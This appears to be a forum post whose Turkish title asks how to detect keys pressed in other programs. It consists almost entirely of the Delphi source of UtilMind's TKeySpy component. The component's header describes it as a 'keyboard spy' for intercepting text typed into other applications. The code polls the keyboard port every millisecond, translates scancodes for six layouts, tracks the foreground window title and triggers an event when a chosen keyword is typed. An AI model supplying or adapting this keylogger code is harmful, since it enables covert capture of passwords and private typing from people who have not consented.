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Harici bir ortamdan basilan tusu anlamak keyboard hook

{*************************************************************} { TKeySpy Component for Delphi 16/32 } { Version: 2.8 } { E-Mail: } { Home page: } { Created: August, 16, 1998 } { Modified: June, 6, 2000 } { Legal: Copyright (c) 1998-2000, UtilMind Solutions } {*************************************************************} { KEYBOARD SPY: } { This component is intended for interception of pressing the } { keyboard. The KeySpy is possible to apply for interception } { of the typed text of the another's programs, as keyboard } { spy, or for processing events at type certain keywords etc..} {*************************************************************} { Properties: ************************************************} { Enabled: As it usual... } { Keyword: At a set of this word event will be } { carried out (See OnKeyword event). } { ActiveLayout: Active keyboard layout (string) Win32 only } { SpyLayout: now present English, Russian, German } { & Italian } {ActiveWindowTitle: Title of active window (Read only) } { Events: ************************************************} { OnKeySpyDown: As OnKeyDown, but in any place (window). } { OnKeySpyUp: As OnKeyUp, but in any place (window). } { OnKeyword: The Keyword has been typed (See Keyword). } { OnLayoutChanged: The Keyboard layout was changed. Win32 only} { OnActiveWindowChanged: } {*************************************************************} { IMPORTANT NOTE: } { This code may be used and modified by anyone so long as } { this header and copyright information remains intact. By } { using this code you agree to indemnify UtilMind Solutions } { from any liability that might arise from its use. You must } { obtain written consent before selling or redistributing } { this code. } {*************************************************************} { Changes: } { 20.I.1999: Added 32-bit support } { 14.V.1999: Added OnChangeLayout event. } { Added Italian and Russian keyboard layouts. } { 28.V.1999: Added ActiveWindowTitle property. } { 27.VII.1999: Added Portugese keyboard layout. } { Thanks to Tiago Correia (} { 19.IX.1999: Added German keyboard layout (added by Slaine, } { } { 5.V.2000: Added French keyboard layout (added by Vincent } { CALLIES, } {*************************************************************} unit KeySpy; interface uses {$IFDEF WIN32} Windows, {$ELSE} WinTypes, WinProcs,{$ENDIF} SysUtils, Controls, Classes, Messages, Forms; type TSpyLayout = (klAmerican, klItalian, klRussian, klPortuguese, klGerman, klFrench); TOnKeySpy = procedure(Sender: TObject; Key: Byte; KeyStr: String) of object; {$IFDEF Win32} TOnLayoutChanged = procedure(Sender: TObject; Layout: String) of object; {$ENDIF} TOnActiveWindowChanged = procedure(Sender: TObject; ActiveTitle: String) of object; TKeySpy = class(TComponent) private {$IFDEF Win32} CurrentLayout: String; FActiveLayout: String; {$ENDIF} CurrentActiveWindowTitle: String; FActiveWindowTitle: String; FSpyLayout: TSpyLayout; FWindowHandle: HWnd; FOnKeySpyDown, FOnKeySpyUp: TOnKeySpy; FOnKeyword: TNotifyEvent; {$IFDEF Win32} FOnLayoutChanged: TOnLayoutChanged; {$ENDIF} FOnActiveWindowChanged: TOnActiveWindowChanged; FEnabled: Boolean; FKeyword, KeyComp: String; OldKey: Byte; LShiftUp, RShiftUp: Boolean; procedure UpdateTimer; procedure SetEnabled(Value: Boolean); procedure SetKeyword(Value: String); procedure WndProc(var Msg: TMessage); procedure SetNothingStr(Value: String); protected procedure KeySpy; dynamic; public constructor Create(AOwner: TComponent); override; destructor Destroy; override; published property ActiveWindowTitle: String read FActiveWindowTitle write SetNothingStr; property Enabled: Boolean read FEnabled write SetEnabled; property Keyword: String read FKeyword write SetKeyword; property SpyLayout: TSpyLayout read FSpyLayout write FSpyLayout; {$IFDEF Win32} property ActiveLayout: String read FActiveLayout write FActiveLayout; {$ENDIF} property OnKeySpyDown: TOnKeySpy read FOnKeySpyDown write FOnKeySpyDown; property OnKeySpyUp: TOnKeySpy read FOnKeySpyUp write FOnKeySpyUp; property OnKeyword: TNotifyEvent read FOnKeyword write FOnKeyword; {$IFDEF Win32} property OnLayoutChanged: TOnLayoutChanged read FOnLayoutChanged write FOnLayoutChanged; {$ENDIF} property OnActiveTitleChanged: TOnActiveWindowChanged read FOnActiveWindowChanged write FOnActiveWindowChanged; end; procedure Register; implementation {$I} constructor TKeySpy.Create(AOwner: TComponent); begin inherited Create(AOwner); LShiftUp := True; RShiftUp := True; FEnabled := True; FWindowHandle := AllocateHWnd(WndProc); if FEnabled then UpdateTimer; end; destructor TKeySpy.Destroy; begin FEnabled := False; UpdateTimer; DeallocateHWnd(FWindowHandle); inherited Destroy; end; procedure TKeySpy.WndProc(var Msg: TMessage); begin with Msg do if Msg = WM_TIMER then try KeySpy; except Application.HandleException(Self); end else Result := DefWindowProc(FWindowHandle, Msg, wParam, lParam); end; procedure TKeySpy.UpdateTimer; var b: Byte; begin KillTimer(FWindowHandle, 1); if FEnabled then begin asm mov al, 60h mov b, al end; OldKey := b; if SetTimer(FWindowHandle, 1, 1, nil) = 0 then raise EOutOfResources.Create('No timers'); end; end; procedure TKeySpy.SetEnabled(Value: Boolean); begin if Value <> FEnabled then begin FEnabled := Value; UpdateTimer; end; end; procedure TKeySpy.SetKeyword(Value: String); begin Value := LowerCase(Value); if Value <> FKeyword then FKeyword := Value; end; procedure TKeySpy.KeySpy; var PC: Array[0..$FFF] of Char; Key: Byte; St: String; Wnd: hWnd; begin {$IFDEF Win32} Wnd := GetForegroundWindow; {$ELSE} Wnd := GetActiveWindow; {$ENDIF} SendMessage(Wnd, wm_GetText, $FFF, LongInt(@PC)); FActiveWindowTitle := StrPas(PC); if CurrentActiveWindowTitle <> FActiveWindowTitle then begin CurrentActiveWindowTitle := FActiveWindowTitle; if Assigned(FOnActiveWindowChanged) then FOnActiveWindowChanged(Self, FActiveWindowTitle); end; {$IFDEF Win32} GetKeyboardLayoutName(PC); FActiveLayout := StrPas(PC); if (FActiveLayout <> CurrentLayout) then begin CurrentLayout := FActiveLayout; if Assigned(FOnLayoutChanged) then FOnLayoutChanged(Self, FActiveLayout); end; {$ENDIF} asm in al, 60h mov Key, al end; if Key = 170 then begin Key := 84; LShiftUp := True; end; if Key = 182 then begin Key := 85; RShiftUp := True; end; if Key = 42 then LShiftUp := False; if Key = 54 then RShiftUp := False; if Key <> OldKey then begin OldKey := Key; if Key <= 88 then begin case FSpyLayout of klAmerican: if LShiftUp and RShiftUp then St := StrPas(LowButtonName[Key]) else St := StrPas(HiButtonName[Key]); klItalian: if LShiftUp and RShiftUp then St := StrPas(ItalianLowButtonName[Key]) else St := StrPas(ItalianHiButtonName[Key]); klRussian: if LShiftUp and RShiftUp then St := StrPas(RussianLowButtonName[Key]) else St := StrPas(RussianHiButtonName[Key]); klPortuguese: if LShiftUp and RShiftUp then St := StrPas(PortugueseLowButtonName[Key]) else St := StrPas(PortugueseHiButtonName[Key]); klGerman: if LShiftUp and RShiftUp then St := StrPas(GermanLowButtonName[Key]) else St := StrPas(GermanHiButtonName[Key]); klFrench: if LShiftUp and RShiftUp then St := StrPas(FrenchLowButtonName[Key]) else St := StrPas(FrenchHiButtonName[Key]); end; if Assigned(FOnKeySpyDown) then FOnKeySpyDown(Self, Key, St); if Assigned(FOnKeyword) then begin KeyComp := KeyComp + St; if Length(KeyComp) > Length(FKeyword) then begin Move(KeyComp[Length(St) + 1], KeyComp[1], Length(KeyComp)); {$IFDEF WIN32} SetLength(KeyComp, Length(FKeyword)); {$ELSE} KeyComp[0] := char(Length(FKeyword)); {$ENDIF} end; if LowerCase(KeyComp) = FKeyword then FOnKeyword(Self); end; end else if Key - 128 <= 88 then begin case FSpyLayout of klAmerican: if LShiftUp and RShiftUp then St := StrPas(LowButtonName[Key - 128]) else St := StrPas(HiButtonName[Key - 128]); klItalian: if LShiftUp and RShiftUp then St := StrPas(ItalianLowButtonName[Key - 128]) else St := StrPas(ItalianHiButtonName[Key - 128]); klRussian: if LShiftUp and RShiftUp then St := StrPas(RussianLowButtonName[Key - 128]) else St := StrPas(RussianHiButtonName[Key - 128]); klPortuguese: if LShiftUp and RShiftUp then St := StrPas(PortugueseLowButtonName[Key - 128]) else St := StrPas(PortugueseHiButtonName[Key - 128]); klGerman: if LShiftUp and RShiftUp then St := StrPas(GermanLowButtonName[Key - 128]) else St := StrPas(GermanHiButtonName[Key - 128]); klFrench: if LShiftUp and RShiftUp then St := StrPas(FrenchLowButtonName[Key - 128]) else St := StrPas(FrenchHiButtonName[Key - 128]); end; if Assigned(FOnKeySpyUp) then FOnKeySpyUp(Self, Key, St) end; end; end; procedure TKeySpy.SetNothingStr(Value: String); begin {} end; procedure Register; begin RegisterComponents('UtilMind', [TKeySpy]); end; end.